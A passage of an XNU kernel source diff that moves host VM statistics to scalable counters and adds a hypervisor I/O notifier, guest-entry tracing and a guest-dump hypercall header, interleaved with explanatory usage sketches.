+       out->pageouts = counter_load(&vm_statistics_pageouts);
+       out->faults = counter_load(&vm_statistics_faults);
+       out->cow_faults = counter_load(&vm_statistics_cow_faults);
+       out->lookups = counter_load(&vm_statistics_lookups);
+       out->hits = counter_load(&vm_statistics_hits);
+       out->compressions = counter_load(&vm_statistics_compressions);
+       out->decompressions = counter_load(&vm_statistics_decompressions);
+       out->swapins = counter_load(&vm_statistics_swapins);
+       out->swapouts = counter_load(&vm_statistics_swapouts);
+}
 vm_extmod_statistics_data_t host_extmod_statistics;
 
 kern_return_t
@@ -123,8 +152,6 @@ host_processors(host_priv_t host_priv, processor_array_t * out_array, mach_msg_t
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        unsigned int count = processor_count;
        assert(count != 0);
 
@@ -402,19 +429,7 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty
                        return KERN_FAILURE;
                }
 
-               host_vm_stat = *PERCPU_GET_MASTER(vm_stat);
-
-               percpu_foreach_secondary(stat, vm_stat) {
-                       vm_statistics64_data_t data = *stat;
-                       host_vm_stat.zero_fill_count += data.zero_fill_count;
-                       host_vm_stat.reactivations += data.reactivations;
-                       host_vm_stat.pageins += data.pageins;
-                       host_vm_stat.pageouts += data.pageouts;
-                       host_vm_stat.faults += data.faults;
-                       host_vm_stat.cow_faults += data.cow_faults;
-                       host_vm_stat.lookups += data.lookups;
-                       host_vm_stat.hits += data.hits;
-               }
+               get_host_vm_stats(&host_vm_stat);
 
                stat32 = (vm_statistics_t)info;
 
@@ -427,11 +442,11 @@ host_statistics(host_t host, host_flavor_t flavor, host_info_t info, mach_msg_ty
                        }
                }
                stat32->inactive_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_inactive_count);
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
                stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count);
-#else
+#else /* !XNU_TARGET_OS_OSX */
                stat32->wire_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
                stat32->zero_fill_count = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.zero_fill_count);
                stat32->reactivations = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.reactivations);
                stat32->pageins = VM_STATISTICS_TRUNCATE_TO_32_BIT(host_vm_stat.pageins);
@@ -793,24 +808,7 @@ vm_stats(void *info, unsigned int *count)
        if (*count < HOST_VM_INFO64_REV0_COUNT) {
                return KERN_FAILURE;
        }
-
-       host_vm_stat = *PERCPU_GET_MASTER(vm_stat);
-
-       percpu_foreach_secondary(stat, vm_stat) {
-               vm_statistics64_data_t data = *stat;
-               host_vm_stat.zero_fill_count += data.zero_fill_count;
-               host_vm_stat.reactivations += data.reactivations;
-               host_vm_stat.pageins += data.pageins;
-               host_vm_stat.pageouts += data.pageouts;
-               host_vm_stat.faults += data.faults;
-               host_vm_stat.cow_faults += data.cow_faults;
-               host_vm_stat.lookups += data.lookups;
-               host_vm_stat.hits += data.hits;
-               host_vm_stat.compressions += data.compressions;
-               host_vm_stat.decompressions += data.decompressions;
-               host_vm_stat.swapins += data.swapins;
-               host_vm_stat.swapouts += data.swapouts;
-       }
+       get_host_vm_stats(&host_vm_stat);
 
        vm_statistics64_t stat = (vm_statistics64_t)info;
 
@@ -827,11 +825,11 @@ vm_stats(void *info, unsigned int *count)
                }
        }
        stat->inactive_count = vm_page_inactive_count;
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        stat->wire_count = vm_page_wire_count;
-#else
+#else /* !XNU_TARGET_OS_OSX */
        stat->wire_count = vm_page_wire_count + vm_page_throttled_count + vm_lopage_free_count;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        stat->zero_fill_count = host_vm_stat.zero_fill_count;
        stat->reactivations = host_vm_stat.reactivations;
        stat->pageins = host_vm_stat.pageins;
@@ -981,20 +979,6 @@ set_sched_stats_active(boolean_t active)
        return KERN_SUCCESS;
 }
 
-
-uint64_t
-get_pages_grabbed_count(void)
-{
-       uint64_t pages_grabbed_count = 0;
-
-       percpu_foreach(count, vm_page_grab_count) {
-               pages_grabbed_count += *count;
-       }
-
-       return pages_grabbed_count;
-}
-
-
 kern_return_t
 get_sched_statistics(struct _processor_statistics_np * out, uint32_t * count)
 {
@@ -1290,6 +1274,10 @@ host_set_special_port_from_user(host_priv_t host_priv, int id, ipc_port_t port)
                return KERN_NO_ACCESS;
        }
 
+       if (IP_VALID(port) && (port->ip_immovable_receive || port->ip_immovable_send)) {
+               return KERN_INVALID_RIGHT;
+       }
+
        return host_set_special_port(host_priv, id, port);
 }
 
@@ -1415,8 +1403,6 @@ host_set_multiuser_config_flags(host_priv_t host_priv, uint32_t multiuser_config
                return KERN_INVALID_ARGUMENT;
        }
 
-       assert(host_priv == &realhost);
-
        /*
         * Always enforce that the multiuser bit is set
         * if a value is written to the commpage word.
index 9d21a4a4c4534d6807dbe3692a96c07b3365a0f5..d6e12f31f7cad4ef93cbe280e64b6e9e227fa8dc 100644 (file)
 #ifndef _KERN_HOST_STATISTICS_H_
 #define _KERN_HOST_STATISTICS_H_
 
-#include <libkern/OSAtomic.h>
-#include <mach/vm_statistics.h>
-#include <kern/percpu.h>
-#include <os/atomic_private.h>
+#include <kern/counter.h>
 
-extern
-uint64_t get_pages_grabbed_count(void);
+SCALABLE_COUNTER_DECLARE(vm_statistics_zero_fill_count);        /* # of zero fill pages */
+SCALABLE_COUNTER_DECLARE(vm_statistics_reactivations);          /* # of pages reactivated */
+SCALABLE_COUNTER_DECLARE(vm_statistics_pageins);                /* # of pageins */
+SCALABLE_COUNTER_DECLARE(vm_statistics_pageouts);               /* # of pageouts */
+SCALABLE_COUNTER_DECLARE(vm_statistics_faults);                 /* # of faults */
+SCALABLE_COUNTER_DECLARE(vm_statistics_cow_faults);             /* # of copy-on-writes */
+SCALABLE_COUNTER_DECLARE(vm_statistics_lookups);                /* object cache lookups */
+SCALABLE_COUNTER_DECLARE(vm_statistics_hits);                   /* object cache hits */
+SCALABLE_COUNTER_DECLARE(vm_statistics_purges);                 /* # of pages purged */
+SCALABLE_COUNTER_DECLARE(vm_statistics_decompressions);         /* # of pages decompressed */
+SCALABLE_COUNTER_DECLARE(vm_statistics_compressions);           /* # of pages compressed */
+SCALABLE_COUNTER_DECLARE(vm_statistics_swapins);                /* # of pages swapped in (via compression segments) */
+SCALABLE_COUNTER_DECLARE(vm_statistics_swapouts);               /* # of pages swapped out (via compression segments) */
+SCALABLE_COUNTER_DECLARE(vm_statistics_total_uncompressed_pages_in_compressor); /* # of pages (uncompressed) held within the compressor. */
 
-PERCPU_DECL(vm_statistics64_data_t, vm_stat);
-PERCPU_DECL(uint64_t, vm_page_grab_count);
-
-#define VM_STAT_INCR(event)                                             \
-MACRO_BEGIN                                                             \
-       os_atomic_inc(&PERCPU_GET(vm_stat)->event, relaxed);            \
-MACRO_END
-
-#define VM_STAT_INCR_BY(event, amount)                                  \
-MACRO_BEGIN                                                             \
-       os_atomic_add(&PERCPU_GET(vm_stat)->event, amount, relaxed);    \
-MACRO_END
+SCALABLE_COUNTER_DECLARE(vm_page_grab_count);
 
 #endif  /* _KERN_HOST_STATISTICS_H_ */
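With the per-CPU vm_stat structure and the VM_STAT_INCR()/VM_STAT_INCR_BY() macros gone, call sites presumably switch to the scalable-counter primitives from <kern/counter.h>. Only counter_load() is visible in this diff; counter_inc() and counter_add() below are assumed counterparts. A minimal sketch of the expected replacement idiom:

#include <stdbool.h>
#include <kern/counter.h>
#include <kern/host_statistics.h>

/* Sketch: how a VM fault path would bump the new scalable counters.
 * counter_inc()/counter_add() are assumed here; only counter_load()
 * appears in the hunks above. */
static void
vm_fault_account(bool was_zero_fill, uint64_t compressed_pages)
{
        counter_inc(&vm_statistics_faults);              /* was VM_STAT_INCR(faults) */
        if (was_zero_fill) {
                counter_inc(&vm_statistics_zero_fill_count);
        }
        if (compressed_pages != 0) {
                /* was VM_STAT_INCR_BY(compressions, compressed_pages) */
                counter_add(&vm_statistics_compressions, compressed_pages);
        }
}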
diff --git a/osfmk/kern/hv_io_notifier.c b/osfmk/kern/hv_io_notifier.c
new file mode 100644 (file)
index 0000000..7f0938f
--- /dev/null
@@ -0,0 +1,274 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#include <kern/hv_support.h>
+#include <kern/ipc_mig.h>
+#include <kern/kalloc.h>
+#include <kern/locks.h>
+#include <mach/port.h>
+#include <sys/queue.h>
+#include <ipc/ipc_port.h>
+
+#include <stdbool.h>
+
+#include "hv_io_notifier.h"
+
+static LCK_GRP_DECLARE(ion_lock_grp, "io notifier");
+
+typedef struct hv_ion_entry {
+       LIST_ENTRY(hv_ion_entry) list;
+
+       uint64_t           addr;
+       size_t             size;
+       uint64_t           value;
+       uint32_t           flags;
+
+       mach_port_t        port;
+       mach_port_name_t   port_name;
+} hv_ion_entry_t;
+
+LIST_HEAD(io_notifier_list, hv_ion_entry);
+
+struct hv_ion_grp {
+       struct io_notifier_list list;
+       lck_rw_t lock;
+};
+
+/*
+ * Lookup a matching notifier and return it.
+ */
+static hv_ion_entry_t *
+hv_io_notifier_grp_lookup(const hv_ion_grp_t *grp, const hv_ion_entry_t *key)
+{
+       hv_ion_entry_t *ion = NULL;
+
+       LIST_FOREACH(ion, &grp->list, list) {
+               if (ion->addr != key->addr) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != key->size) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != key->value) {
+                       continue;
+               }
+
+               if (ion->port_name != key->port_name) {
+                       continue;
+               }
+
+               if (ion->flags != key->flags) {
+                       continue;
+               }
+
+               return ion;
+       }
+
+       return NULL;
+}
+
+/*
+ * Add a new notifier.
+ * Return KERN_SUCCESS if the notifier was added, an error otherwise.
+ */
+kern_return_t
+hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *notifier)
+{
+       hv_ion_entry_t *ion = NULL;
+
+       ion = kalloc(sizeof(*ion));
+       if (ion == NULL) {
+               return KERN_RESOURCE_SHORTAGE;
+       }
+
+       ion->addr = notifier->addr;
+       ion->size = notifier->size;
+       ion->value = notifier->value;
+       ion->flags = notifier->flags;
+       ion->port_name = notifier->port_name;
+
+       kern_return_t ret = ipc_object_copyin(current_task()->itk_space,
+           ion->port_name, MACH_MSG_TYPE_COPY_SEND, (ipc_object_t *)&ion->port, 0,
+           NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
+       if (ret != KERN_SUCCESS) {
+               kfree(ion, sizeof(*ion));
+               return ret;
+       }
+
+       lck_rw_lock_exclusive(&grp->lock);
+
+       if (hv_io_notifier_grp_lookup(grp, ion) != NULL) {
+               lck_rw_done(&grp->lock);
+               ipc_port_release_send(ion->port);
+               kfree(ion, sizeof(*ion));
+               return KERN_FAILURE;
+       }
+
+       LIST_INSERT_HEAD(&grp->list, ion, list);
+
+       lck_rw_done(&grp->lock);
+
+       return KERN_SUCCESS;
+}
+
+/*
+ * Remove and free a notifier.
+ * Return KERN_SUCCESS if the notifier was removed, an error otherwise.
+ */
+kern_return_t
+hv_io_notifier_grp_remove(hv_ion_grp_t *grp, const hv_ion_t *notifier)
+{
+       hv_ion_entry_t ion = {};
+       hv_ion_entry_t *entry = NULL;
+
+       ion.addr = notifier->addr;
+       ion.size = notifier->size;
+       ion.value = notifier->value;
+       ion.flags = notifier->flags;
+       ion.port_name = notifier->port_name;
+
+       lck_rw_lock_exclusive(&grp->lock);
+
+       entry = hv_io_notifier_grp_lookup(grp, &ion);
+       if (entry == NULL) {
+               lck_rw_done(&grp->lock);
+               return KERN_FAILURE;
+       }
+
+       LIST_REMOVE(entry, list);
+
+       lck_rw_done(&grp->lock);
+
+       ipc_port_release_send(entry->port);
+       kfree(entry, sizeof(*entry));
+
+       return KERN_SUCCESS;
+}
+
+/*
+ * Find matching notifiers and notify the port.
+ * Returns KERN_SUCCESS if no errors occurred when sending notifications and at
+ * least one notification was sent.
+ */
+kern_return_t
+hv_io_notifier_grp_fire(hv_ion_grp_t *grp, uint64_t addr, size_t size,
+    uint64_t value)
+{
+       kern_return_t kr = KERN_FAILURE;
+       hv_ion_entry_t *ion = NULL;
+       bool fired = false;
+
+       lck_rw_lock_shared(&grp->lock);
+
+       LIST_FOREACH(ion, &grp->list, list) {
+               if (ion->addr != addr) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_SIZE) && ion->size != size) {
+                       continue;
+               }
+
+               if (!(ion->flags & kHV_ION_ANY_VALUE) && ion->value != value) {
+                       continue;
+               }
+
+               hv_ion_message_t msg = {
+                       .header.msgh_bits         = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0),
+                       .header.msgh_size         = sizeof(msg),
+                       .header.msgh_remote_port  = ion->port,
+                       .header.msgh_local_port   = MACH_PORT_NULL,
+                       .header.msgh_voucher_port = MACH_PORT_NULL,
+                       .header.msgh_id           = 0,
+
+                       .addr = addr,
+                       .size = size,
+                       .value = value,
+               };
+
+               kr = mach_msg_send_from_kernel_with_options(&msg.header, sizeof(msg),
+                   MACH_SEND_TIMEOUT, MACH_MSG_TIMEOUT_NONE);
+
+               /*
+                * A timeout will occur when the queue is full. Ignore it if so
+                * configured.
+                */
+               if (kr == MACH_SEND_TIMED_OUT && !(ion->flags & kHV_ION_EXIT_FULL)) {
+                       kr = MACH_MSG_SUCCESS;
+               }
+
+               if (kr != MACH_MSG_SUCCESS) {
+                       fired = false;
+                       break;
+               }
+
+               fired = true;
+       }
+
+       lck_rw_done(&grp->lock);
+       return fired ? KERN_SUCCESS : KERN_FAILURE;
+}
+
+kern_return_t
+hv_io_notifier_grp_alloc(hv_ion_grp_t **grp_p )
+{
+       hv_ion_grp_t *grp = kalloc(sizeof(*grp));
+
+       if (grp == NULL) {
+               return KERN_RESOURCE_SHORTAGE;
+       }
+       bzero(grp, sizeof(*grp));
+
+       lck_rw_init(&grp->lock, &ion_lock_grp, LCK_ATTR_NULL);
+
+       *grp_p = grp;
+       return KERN_SUCCESS;
+}
+
+void
+hv_io_notifier_grp_free(hv_ion_grp_t **grp_p)
+{
+       hv_ion_grp_t *grp = *grp_p;
+
+       while (!LIST_EMPTY(&grp->list)) {
+               hv_ion_entry_t *ion = LIST_FIRST(&grp->list);
+
+               LIST_REMOVE(ion, list);
+
+               ipc_port_release_send(ion->port);
+               kfree(ion, sizeof(*ion));
+       }
+
+       lck_rw_destroy(&grp->lock, &ion_lock_grp);
+
+       kfree(grp, sizeof(*grp));
+
+       *grp_p = NULL;
+}
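Taken together, this file lets a hypervisor backend turn selected guest I/O writes into Mach messages. A hedged usage sketch follows; the doorbell address, the client-supplied port name, and the MMIO-exit hook are hypothetical, while the hv_io_notifier_grp_* calls and hv_ion_t fields come from the code above:

#include <mach/kern_return.h>
#include <kern/hv_io_notifier.h>

/* Illustrative doorbell register a VMM wants forwarded to userspace. */
#define DOORBELL_ADDR   0xfed00000ULL           /* hypothetical address */

static hv_ion_grp_t *ion_grp;

static kern_return_t
vmm_setup_doorbell(mach_port_name_t client_port_name)
{
        kern_return_t kr = hv_io_notifier_grp_alloc(&ion_grp);
        if (kr != KERN_SUCCESS) {
                return kr;
        }

        hv_ion_t ion = {
                .addr      = DOORBELL_ADDR,
                .size      = 0,                 /* ignored: any access size matches */
                .value     = 0,                 /* ignored: any written value matches */
                .port_name = client_port_name,  /* send right is copied in by _grp_add() */
                .flags     = kHV_ION_ANY_SIZE | kHV_ION_ANY_VALUE,
        };
        return hv_io_notifier_grp_add(ion_grp, &ion);
}

/* Called from a hypothetical MMIO-exit handler; KERN_SUCCESS means at
 * least one matching notification was delivered without error. */
static kern_return_t
vmm_handle_mmio_write(uint64_t addr, size_t size, uint64_t value)
{
        return hv_io_notifier_grp_fire(ion_grp, addr, size, value);
}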
diff --git a/osfmk/kern/hv_io_notifier.h b/osfmk/kern/hv_io_notifier.h
new file mode 100644 (file)
index 0000000..cd50a3f
--- /dev/null
@@ -0,0 +1,74 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#pragma once
+
+#include <mach/port.h>
+#include <stdint.h>
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+enum {
+       kHV_ION_NONE             = (0u << 0),
+       kHV_ION_ANY_VALUE        = (1u << 1),
+       kHV_ION_ANY_SIZE         = (1u << 2),
+       kHV_ION_EXIT_FULL        = (1u << 3),
+};
+
+#ifdef KERNEL_PRIVATE
+
+typedef struct {
+       mach_msg_header_t header;
+       uint64_t addr;
+       uint64_t size;
+       uint64_t value;
+} hv_ion_message_t;
+
+typedef struct {
+       uint64_t addr;
+       uint64_t size;
+       uint64_t value;
+       uint32_t port_name;
+       uint32_t flags;
+} hv_ion_t;
+
+typedef struct hv_ion_grp hv_ion_grp_t;
+
+extern kern_return_t hv_io_notifier_grp_add(hv_ion_grp_t *grp, const hv_ion_t *);
+extern kern_return_t hv_io_notifier_grp_remove(hv_ion_grp_t *, const hv_ion_t *);
+extern kern_return_t hv_io_notifier_grp_fire(hv_ion_grp_t *, uint64_t, size_t, uint64_t);
+extern kern_return_t hv_io_notifier_grp_alloc(hv_ion_grp_t **);
+extern void hv_io_notifier_grp_free(hv_ion_grp_t **);
+
+#endif /* KERNEL_PRIVATE */
+
+#ifdef __cplusplus
+}
+#endif
index ca9054202bfd90b91cdb21480e5507d77f4fcac9..39ef71694d6ed86a8ab71f2833d0ddeab08008dd 100644 (file)
@@ -33,6 +33,7 @@
 #include <libkern/OSAtomic.h>
 #include <vm/vm_pageout.h>
 #include <mach/sdt.h>
+#include <sys/kdebug.h>
 
 #if defined(__x86_64__) && CONFIG_VMX
 #include <i386/vmx/vmx_cpu.h>
@@ -52,6 +53,8 @@ hv_callbacks_t hv_callbacks = {
        .thread_destroy = NULL, /* thread is being destroyed */
        .task_destroy = NULL,   /* task is being destroyed */
        .volatile_state = NULL, /* thread state is becoming volatile */
+       .resume = NULL,         /* system is being resumed */
+       .memory_pressure = NULL,/* (unused) */
 };
 
 /* trap tables for hv_*_trap syscalls */
@@ -192,7 +195,8 @@ hv_release_callbacks(void)
                .suspend = NULL,
                .thread_destroy = NULL,
                .task_destroy = NULL,
-               .volatile_state = NULL
+               .volatile_state = NULL,
+               .resume = NULL,
        };
 
        hv_callbacks_enabled = 0;
@@ -208,6 +212,15 @@ hv_suspend(void)
        }
 }
 
+/* system resume notification */
+void
+hv_resume(void)
+{
+       if (hv_callbacks_enabled && hv_callbacks.resume) {
+               hv_callbacks.resume();
+       }
+}
+
 /* dispatch hv_task_trap/hv_thread_trap syscalls to trap handlers,
  *  fail for invalid index or absence of trap handlers, trap handler is
  *  responsible for validating targets */
@@ -244,10 +257,30 @@ void
 hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs)
 {
        DTRACE_HV2(guest__enter, uint32_t, vcpu_id, uint64_t *, vcpu_regs);
+
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_START, vcpu_id);
 }
 
 void
-hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs)
+hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t reason)
 {
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id,
+           reason);
+
        DTRACE_HV2(guest__exit, uint32_t, vcpu_id, uint64_t *, vcpu_regs);
 }
+
+void
+hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs, uint32_t failure,
+    uint32_t error)
+{
+       /*
+        * An error indicates that the guest enter failed so there will be no
+        * guest exit. Close the guest enter interval.
+        */
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ENTER) | DBG_FUNC_END, vcpu_id,
+           -1, failure, error);
+       KDBG(MACHDBG_CODE(DBG_MACH_HV, HV_GUEST_ERROR), vcpu_id, failure, error);
+
+       DTRACE_HV3(guest__error, uint32_t, vcpu_id, uint64_t *, vcpu_regs, uint32_t, failure);
+}
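These kdebug points form an interval: hv_trace_guest_enter() opens it with DBG_FUNC_START on the HV_GUEST_ENTER code, and either hv_trace_guest_exit() or, when the entry itself fails, hv_trace_guest_error() closes it with DBG_FUNC_END, so a trace tool can attribute time spent in the guest per vCPU. A rough sketch of the expected call pattern; run_vcpu_hw() and its out-parameters are hypothetical:

#include <stdbool.h>
#include <stdint.h>
#include <kern/hv_support.h>

/* Hypothetical hardware entry helper: returns true when the guest ran and
 * exited normally, false when the VM entry itself failed. */
extern bool run_vcpu_hw(uint32_t vcpu_id, uint32_t *exit_reason,
    uint32_t *failure, uint32_t *error);

static void
vcpu_run_once(uint32_t vcpu_id, uint64_t *vcpu_regs)
{
        uint32_t exit_reason = 0, failure = 0, error = 0;

        hv_trace_guest_enter(vcpu_id, vcpu_regs);                 /* DBG_FUNC_START */

        if (run_vcpu_hw(vcpu_id, &exit_reason, &failure, &error)) {
                hv_trace_guest_exit(vcpu_id, vcpu_regs, exit_reason); /* DBG_FUNC_END */
        } else {
                /* No guest exit will follow a failed entry, so the error path
                 * both closes the interval and logs HV_GUEST_ERROR. */
                hv_trace_guest_error(vcpu_id, vcpu_regs, failure, error);
        }
}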
index 0b7fa64d133a08ef086e2c70d1b30a426764a0cd..a744516a94195fcf0a8b1521688eb2911df0f469 100644 (file)
@@ -36,6 +36,7 @@ extern "C" {
 #include <stdint.h>
 #include <kern/kern_types.h>
 #include <mach/kern_return.h>
+#include <kern/hv_io_notifier.h>
 
 typedef enum {
        HV_DEBUG_STATE
@@ -60,6 +61,8 @@ typedef struct {
        void (*thread_destroy)(void *vcpu);
        void (*task_destroy)(void *vm);
        void (*volatile_state)(void *vcpu, int state);
+#define HV_CALLBACKS_RESUME_DEFINED 1
+       void (*resume)(void);
        void (*memory_pressure)(void);
 } hv_callbacks_t;
 
@@ -79,13 +82,17 @@ extern void hv_release_traps(hv_trap_type_t trap_type);
 extern kern_return_t hv_set_callbacks(hv_callbacks_t callbacks);
 extern void hv_release_callbacks(void);
 extern void hv_suspend(void);
+extern void hv_resume(void);
 extern kern_return_t hv_task_trap(uint64_t index, uint64_t arg);
 extern kern_return_t hv_thread_trap(uint64_t index, uint64_t arg);
 extern boolean_t hv_ast_pending(void);
 extern void hv_port_notify(mach_msg_header_t *msg);
 
 extern void hv_trace_guest_enter(uint32_t vcpu_id, uint64_t *vcpu_regs);
-extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs);
+extern void hv_trace_guest_exit(uint32_t vcpu_id, uint64_t *vcpu_regs,
+    uint32_t reason);
+extern void hv_trace_guest_error(uint32_t vcpu_id, uint64_t *vcpu_regs,
+    uint32_t failure, uint32_t error);
 
 #if defined(__cplusplus)
 }
diff --git a/osfmk/kern/hvg_hypercall.h b/osfmk/kern/hvg_hypercall.h
new file mode 100644 (file)
index 0000000..d559fa3
--- /dev/null
@@ -0,0 +1,106 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef _KERN_HVG_HYPERCALL_H_
+#define _KERN_HVG_HYPERCALL_H_
+
+#include <os/base.h>
+#include <stdint.h>
+
+/* Architecture-independent definitions (exported to userland) */
+
+/*
+ * Apple Hypercall arguments
+ */
+typedef struct hvg_hcall_args {
+       uint64_t args[6];
+} hvg_hcall_args_t;
+
+
+/*
+ * Apple Hypercall return output
+ */
+typedef struct hvg_hcall_output {
+       uint64_t regs[7];
+} hvg_hcall_output_t;
+
+
+/*
+ * Apple Hypercall return code
+ */
+
+OS_CLOSED_ENUM(hvg_hcall_return, uint32_t,
+    HVG_HCALL_SUCCESS             = 0x0000,       /* The call succeeded */
+    HVG_HCALL_ACCESS_DENIED       = 0x0001,       /* Invalid access right */
+    HVG_HCALL_INVALID_CODE        = 0x0002,       /* Hypercall code not recognized */
+    HVG_HCALL_INVALID_PARAMETER   = 0x0003,       /* Specified register value not valid */
+    HVG_HCALL_IO_FAILED           = 0x0004,       /* Input/output error */
+    HVG_HCALL_FEAT_DISABLED       = 0x0005,       /* Feature not available */
+    HVG_HCALL_UNSUPPORTED         = 0x0006,       /* Hypercall not supported */
+    );
+
+
+/*
+ * Apple Hypercall call code
+ */
+
+OS_CLOSED_ENUM(hvg_hcall_code, uint32_t,
+    HVG_HCALL_TRIGGER_DUMP        = 0x0001,       /* Collect guest dump */
+    );
+
+/*
+ * Options for collecting kernel vmcore
+ */
+
+OS_CLOSED_OPTIONS(hvg_hcall_dump_option, uint32_t,
+    HVG_HCALL_DUMP_OPTION_REGULAR   =  0x0001     /* Regular dump-guest-memory */
+    );
+
+typedef struct hvg_hcall_vmcore_file {
+       char tag[57];   /* 7 64-bit registers plus 1 byte for '\0' */
+} hvg_hcall_vmcore_file_t;
+
+extern hvg_hcall_return_t
+hvg_hcall_trigger_dump(hvg_hcall_vmcore_file_t *vmcore,
+    const hvg_hcall_dump_option_t dump_option);
+
+
+#ifdef XNU_KERNEL_PRIVATE
+
+/*
+ * For XNU kernel use only (omitted from userland headers)
+ */
+
+#if defined (__x86_64__)
+#include <i386/cpuid.h>
+#include <i386/x86_hypercall.h>
+#endif
+
+#endif /* XNU_KERNEL_PRIVATE */
+
+#endif /* _KERN_HVG_HYPERCALL_H_ */
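HVG_HCALL_TRIGGER_DUMP is the only call code so far, wrapped by hvg_hcall_trigger_dump(): the guest asks the host to collect a vmcore and receives a short tag (seven output registers' worth of characters) naming the dump. A minimal caller sketch, assuming guest-side kernel code where printf is available; error handling is illustrative only:

#include <kern/hvg_hypercall.h>

static void
request_guest_vmcore(void)
{
        hvg_hcall_vmcore_file_t vmcore = { .tag = { 0 } };
        hvg_hcall_return_t ret;

        ret = hvg_hcall_trigger_dump(&vmcore, HVG_HCALL_DUMP_OPTION_REGULAR);
        switch (ret) {
        case HVG_HCALL_SUCCESS:
                printf("vmcore collected, tag: %s\n", vmcore.tag);
                break;
        case HVG_HCALL_UNSUPPORTED:
        case HVG_HCALL_FEAT_DISABLED:
                printf("host does not offer guest dumps (0x%x)\n", ret);
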